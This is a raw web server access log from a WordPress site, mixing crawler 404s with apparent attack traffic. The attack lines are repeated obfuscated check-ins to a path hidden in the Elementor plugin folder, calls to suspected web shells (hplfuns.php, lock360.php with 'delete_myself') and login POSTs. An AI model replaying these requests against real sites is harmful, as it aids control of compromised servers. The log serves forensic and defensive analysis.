77.68.25.176 - - [22/Sep/2026:08:10:37 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383233372p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343633372q3831663761633134643533303363383130636131613262383962636566396462222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
102.90.109.1 - - [22/Sep/2026:08:12:00 +0000] "POST /wp-login.php HTTP/1.1" 302 5220 "https://localpubpassport.co.uk/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
77.68.25.176 - - [22/Sep/2026:08:10:58 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383235382p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343635382q3831336664633138623434353766303032356364663065346330313336343438222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:11:19 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383237392p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343637392q6439623262353337633638363532636434356136303762343762393531326334222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:11:40 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383330302p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343730302q6135363336343863383737653830656466333836353330613866313338336661222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:12:01 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383332312p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343732312q6634366330623865343562386165383364616432613838613563333932393930222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:12:22 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383334322p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343734322q6565663465396439326365656461663030356363653662326564353930623238222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:12:43 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383336332p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343736332q3833323762393764333463363864313839633832636230306630366164633661222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:13:04 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383338342p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343738342q3462393138623139316534383433636337653038363562366561323333313739222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
51.38.115.161 - - [22/Sep/2026:08:14:27 +0000] "POST /wp-login.php HTTP/1.1" 302 5220 "https://localpubpassport.co.uk/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
77.68.25.176 - - [22/Sep/2026:08:13:25 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383430352p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343830352q6262393463316534646264613033613762613834326665366230663761366131222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:13:46 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383432362p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343832362q3934626130313164373339383233386438666661643633656664363662626135222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:14:07 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383434372p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343834372q6161336236356563353333653132313039306532366363363432376236326439222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:08:14:28 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383436382p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343836382q3630303530363830373564373632353664376134333030313566656263353039222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:16:01 +0000] "GET /item/K32480098.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:04 +0000] "GET /item/K42657419.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:07 +0000] "GET /item/K42657499.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:14:49 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383438392p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343838392q6463323432353338653633626136616138303432646561383765393866633161222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:16:10 +0000] "GET /item/K32905322.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:13 +0000] "GET /item/K81761815.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:16 +0000] "GET /item/K20004865.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:19 +0000] "GET /item/K21753625.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:22 +0000] "GET /item/K41428131.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:25 +0000] "GET /item/K62055909.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:28 +0000] "GET /item/K41677907.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:15:10 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383531302p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343931302q3961666339646664366661336665636632316662326662623831653034643535222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:16:31 +0000] "GET /item/K72025678.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:34 +0000] "GET /item/K40189243.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:37 +0000] "GET /item/K52295356.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:40 +0000] "GET /item/K51101420.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:43 +0000] "GET /item/K11375520.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:46 +0000] "GET /item/K30656274.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:49 +0000] "GET /item/K80333455.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.168.98.202 - - [22/Sep/2026:08:16:50 +0000] "GET /hplfuns.php HTTP/1.1" 200 36605 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
199.168.98.202 - - [22/Sep/2026:08:16:50 +0000] "GET /hplfuns.php?ac=p&api=&path=&t=805034706ec219edc240b4da3023ac3e HTTP/1.1" 200 36656 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
199.168.98.202 - - [22/Sep/2026:08:16:51 +0000] "GET /hplfuns.php HTTP/1.1" 200 36605 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
77.68.25.176 - - [22/Sep/2026:08:15:31 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383533312p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343933312q3131323837633832333638353136643366303263356139313038316566626366222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
199.168.98.202 - - [22/Sep/2026:08:16:52 +0000] "GET /hplfuns.php HTTP/1.1" 200 36605 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
216.73.216.40 - - [22/Sep/2026:08:16:52 +0000] "GET /item/K31005658.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.168.98.202 - - [22/Sep/2026:08:16:52 +0000] "POST /hplfuns.php HTTP/1.1" 200 5164 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
199.168.98.202 - - [22/Sep/2026:08:16:53 +0000] "GET /lock360.php?ac=p&api=&path=&t=805034706ec219edc240b4da3023ac3e HTTP/1.1" 403 5807 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
199.168.98.202 - - [22/Sep/2026:08:16:53 +0000] "GET /lock360.php?ac=delete_myself&api=&path=&t=805034706ec219edc240b4da3023ac3e HTTP/1.1" 403 5807 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
199.168.98.202 - - [22/Sep/2026:08:16:54 +0000] "GET /lock360.php?ac=delete_myself&api=&path=&t=805034706ec219edc240b4da3023ac3e HTTP/1.1" 403 5807 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0"
216.73.216.40 - - [22/Sep/2026:08:16:55 +0000] "GET /item/K10997232.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:16:58 +0000] "GET /item/K10247216.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:04 +0000] "GET /item/K50284604.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:06 +0000] "GET /item/K40993395.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:09 +0000] "GET /item/K71290582.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:12 +0000] "GET /item/K10348200.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:15:52 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383535322p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343935322q3362333363626363303030653230626332323564623837633238326635393461222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:17:15 +0000] "GET /item/K71748894.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:18 +0000] "GET /item/K70127318.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:21 +0000] "GET /item/K70745302.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:24 +0000] "GET /item/K31409202.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:27 +0000] "GET /item/K81436487.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:30 +0000] "GET /item/K11513432.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:33 +0000] "GET /item/K21624969.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:16:13 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383537332p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343937332q3762333738623139616333613163356164623961613132376665363665313761222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:17:36 +0000] "GET /item/K32873178.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:39 +0000] "GET /item/K41445571.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:42 +0000] "GET /item/K70647262.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:45 +0000] "GET /item/K10187176.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:48 +0000] "GET /item/K12924760.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:51 +0000] "GET /item/K40316835.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
77.68.25.176 - - [22/Sep/2026:08:16:34 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383539342p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036343939342q6334663337623039353764383633323531386539363735323335366566366630222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:17:54 +0000] "GET /item/K40913235.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:17:57 +0000] "GET /item/K80105071.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:00 +0000] "GET /item/K30535458.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:03 +0000] "GET /item/K72312934.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:06 +0000] "GET /item/K12330640.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:09 +0000] "GET /item/K30622666.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:12 +0000] "GET /item/K62352109.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
119.47.88.254 - - [22/Sep/2026:08:18:14 +0000] "POST /wp-login.php HTTP/1.1" 302 5220 "https://localpubpassport.co.uk/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
77.68.25.176 - - [22/Sep/2026:08:16:55 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036383631352p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036353031352q3761653830653137633531373838633062653430356233613538646635653035222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
216.73.216.40 - - [22/Sep/2026:08:18:15 +0000] "GET /item/K70800702.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:18 +0000] "GET /item/K10059272.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:21 +0000] "GET /item/K10242536.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:24 +0000] "GET /item/K21292657.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:29 +0000] "GET /item/K41484627.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:32 +0000] "GET /item/K72133310.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.40 - - [22/Sep/2026:08:18:35 +0000] "GET /item/K12479528.shtml HTTP/1.1" 404 38409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
